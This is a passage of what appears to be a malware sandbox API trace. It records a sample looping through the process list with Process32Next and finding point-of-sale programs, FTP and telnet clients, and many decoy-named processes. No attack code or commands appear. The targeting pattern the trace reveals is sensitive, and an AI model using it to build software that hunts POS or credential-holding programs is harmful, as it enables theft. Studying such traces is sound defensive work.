[0096.520] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0096.521] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0096.523] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0096.525] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0096.527] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0096.529] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="society-position-myself.exe")) returned 1 [0096.530] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="heavy.exe")) returned 1 [0096.532] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mayvarious.exe")) returned 1 [0096.534] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0096.535] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xa1c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0096.546] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0096.548] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0096.550] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0096.552] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0096.554] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0096.555] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xa80, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.557] Process32Next (in: hSnapshot=0xff8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xa80, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0096.559] CloseHandle (hObject=0xff8) returned 1 [0096.559] Sleep (dwMilliseconds=0x64) [0096.772] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1e74 [0096.786] Process32First (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.788] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.789] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.791] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.793] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.795] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.796] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.798] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.799] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.801] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.803] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.804] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.806] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.807] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.809] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.811] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.812] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.814] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x53, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.815] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.817] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0096.818] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0096.820] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.821] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.824] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0096.826] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.827] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0096.829] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0096.830] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0096.832] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.833] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0096.835] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0096.837] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.838] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.840] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0096.841] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.842] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0096.844] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0096.846] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0096.847] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.849] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0096.850] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0096.852] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0096.853] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0096.855] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0096.857] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0096.858] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0096.860] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0096.861] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0096.863] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0096.865] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0096.866] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0096.868] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0096.869] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0096.871] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0096.872] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0096.874] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0096.875] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0096.907] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0096.909] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0096.912] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0096.913] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0096.915] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0096.918] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0096.920] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0096.922] Process32Next (in: hSnapshot=0x1e74, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0096.925] 